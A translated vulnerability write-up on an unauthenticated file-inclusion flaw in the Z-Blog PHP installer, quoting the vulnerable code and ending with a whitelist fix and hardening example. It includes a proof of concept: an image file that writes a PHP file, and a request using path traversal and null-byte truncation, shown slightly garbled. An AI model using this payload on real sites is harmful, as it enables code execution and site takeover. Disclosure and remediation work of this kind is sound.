Z-Blog: front-end file inclusion vulnerability, no login required.
I heard this is a big vendor? -.-
The front-end inclusion vulnerability requires no login. (I probably just did not find the place where images can be uploaded.)
The details are sparse; that's all there is to it.
http://www.zblogcn.com/zblogphp/
The problem is in zb_install/index.php.
I also noticed what is printed once the installation completes:
Create a database for the installation result! Zblog connects to the database and creates a data table! Data is successfully created and inserted! Save settings. The template is compiled successfully!
The point is that the installer neither prompts the user to delete this directory nor deletes the file automatically.
So the installer file is basically always still present.
<?php
/**
 * Z-Blog with PHP
 * @author
 * @copyright (C) rainbowSoft Studio
 * @version 2.0 2013-07-05
 */
/**
 * installer
 * @param
 * @return array
 */
require '../zb_system/function/c_system_base.php';
require '../zb_system/function/c_system_admin.php';
header('Content-Type: text/html; charset=UTF-8');
define('bingo', '');
define('error', '');
$zbloglang = &$zbp->option['ZC_BLOG_LANGUAGEPACK'];
if (isset($_POST['zbloglang'])) $zbloglang = $_POST['zbloglang'];
$zbp->LoadLanguage('system', '', $zbloglang);
$zbp->LoadLanguage('zb_install', 'zb_install', $zbloglang);
$zbp->option['ZC_BLOG_LANGUAGE'] = $zbp->lang['lang'];
$zblogstep = (int) GetVars('step');
if ($zblogstep == 0) $zblogstep = 1;
if (($zbp->option['ZC_DATABASE_TYPE'] != '') && ($zbp->option['ZC_YUN_SITE'] == '')) {
    $zblogstep = 0;
} elseif (($zbp->option['ZC_DATABASE_TYPE']) && ($zbp->option['ZC_YUN_SITE'])) {
    if ($zbp->Config('system')->CountItem() > 0) $zblogstep = 0;
}
?>
$zbloglang = &$zbp->option['ZC_BLOG_LANGUAGEPACK'];
if (isset($_POST['zbloglang'])) $zbloglang = $_POST['zbloglang'];
$zbp->LoadLanguage('system', '', $zbloglang);
$zbp->LoadLanguage('zb_install', 'zb_install', $zbloglang);
$zbp->option['ZC_BLOG_LANGUAGE'] = $zbp->lang['lang'];
In fact, the vulnerability is right here.
Because this code runs before the script checks whether installation has already completed, we reach it even on a site that is already installed.
$zbloglang = &$zbp->option['ZC_BLOG_LANGUAGEPACK']; // first, zbloglang is defined from the stored option
if (isset($_POST['zbloglang'])) $zbloglang = $_POST['zbloglang']; // if the POST field is set, the variable is taken straight from POST. Because zblog prevents SQL injection by never splicing input into the query functions, it does not escape POST at all. That does reduce injection, but it is also what causes this vulnerability.
$zbp->LoadLanguage('system', '', $zbloglang); // follow this call
$zbp->LoadLanguage('zb_install', 'zb_install', $zbloglang);
$zbp->option['ZC_BLOG_LANGUAGE'] = $zbp->lang['lang'];
public function LoadLanguage($type, $id, $default = '')
{
    if ($type == 'system') {
        if ($default == '') $default = $this->option['ZC_BLOG_LANGUAGEPACK'];
        if (is_readable($f = $this->path . 'zb_users/language/' . $default . '.php')) {
            $this->lang = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
        $default = 'zh-cn';
        if (is_readable($f = $this->path . 'zb_users/language/' . $default . '.php')) {
            $this->lang = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
        $default = 'en';
        if (is_readable($f = $this->path . 'zb_users/language/' . $default . '.php')) {
            $this->lang = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
    } elseif ($type == 'plugin' || $type == 'theme') {
        if ($default == '') $default = $this->option['ZC_BLOG_LANGUAGEPACK'];
        if (is_readable($f = $this->path . 'zb_users/' . $type . '/' . $id . '/language/' . $default . '.php')) {
            $this->lang[$id] = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
        $default = 'zh-cn';
        if (is_readable($f = $this->path . 'zb_users/' . $type . '/' . $id . '/language/' . $default . '.php')) {
            $this->lang[$id] = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
        $default = 'en';
        if (is_readable($f = $this->path . 'zb_users/' . $type . '/' . $id . '/language/' . $default . '.php')) {
            $this->lang[$id] = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
    } elseif ($type != '' && $id != '') {
        if ($default == '') $default = $this->option['ZC_BLOG_LANGUAGEPACK'];
        if (is_readable($f = $this->path . $type . '/language/' . $default . '.php')) {
            $this->lang[$id] = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
        $default = 'zh-cn';
        if (is_readable($f = $this->path . $type . '/language/' . $default . '.php')) {
            $this->lang[$id] = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
        $default = 'en';
        if (is_readable($f = $this->path . $type . '/language/' . $default . '.php')) {
            $this->lang[$id] = require($f);
            $this->langpacklist[] = array($type, $id, $default);
            return true;
        }
    }
}
You can see the same pattern throughout this function: $default is spliced straight into a path and passed to require(). Although the path is forced to end in .php, that suffix can be cut off because the POST value is never escaped.
I couldn't find a place to upload images, so I just created a jpg file myself to test with.
Create a file yu.jpg containing:
fputs(fopen('testx.php','w'),'
');
$zbp->LoadLanguage('system', '', $zbloglang);
$zbp->LoadLanguage('zb_install', 'zb_install', $zbloglang);
Because two language packs are loaded here, once the first call is satisfied the second one will not be, and an error is raised.
So we can simply fputs a file into the root directory.
http://web/small/zblog/zb_install/index.phpzbloglang=../../yu.jpg%00
Solution:
The zbloglang value taken from POST should be restricted here.
Use in_array() against a whitelist such as 'en', 'zh-cn' so that only those language files can be loaded.
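As an added illustration of that fix (this is example code, not Z-BlogPHP's own, and the function names are assumed for the example): a strict whitelist check on the requested pack name, plus a path-containment check that a loader like LoadLanguage() could apply before require().

```php
<?php
// Added example, not Z-BlogPHP's own code: a hardened replacement for the
// unchecked `$zbloglang = $_POST['zbloglang']` in zb_install/index.php.
// Function and constant names below are assumptions for illustration.

// Whitelist of language packs actually shipped in zb_users/language/.
const ALLOWED_LANGPACKS = array('zh-cn', 'en');

// Return a safe pack name, or the fallback if the request value is rejected.
function select_language_pack($requested, $fallback = 'zh-cn')
{
    if (!is_string($requested)) {
        return $fallback;
    }
    // Strict in_array(): the value must be exactly one of the shipped names,
    // so '../../yu.jpg%00', 'en.php', 'EN' and embedded NUL bytes all fail.
    if (!in_array($requested, ALLOWED_LANGPACKS, true)) {
        return $fallback;
    }
    return $requested;
}

// Second line of defence for the loader itself: resolve the final path and
// confirm it stays inside the language directory before require()-ing it.
function language_pack_path($baseDir, $pack)
{
    // realpath() rejects NUL bytes (TypeError in PHP 8), so refuse them first.
    if (strpos($pack, "\0") !== false) {
        return null;
    }
    $dir  = realpath($baseDir);
    $file = realpath($baseDir . '/' . $pack . '.php');
    if ($dir === false || $file === false) {
        return null;
    }
    // realpath() collapses '..', so a traversal resolves outside $dir.
    if (strpos($file, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Constructed sample request values, mirroring the installer's $_POST field.
foreach (array('en', 'zh-cn', "../../yu.jpg\0", 'en.php') as $value) {
    $pack = select_language_pack($value);
    printf("%-20s -> %s\n", addcslashes($value, "\0"), $pack);
}
```

Only 'en' and 'zh-cn' pass through unchanged; the traversal string and 'en.php' fall back to 'zh-cn', and language_pack_path() refuses any resolved file outside the language directory.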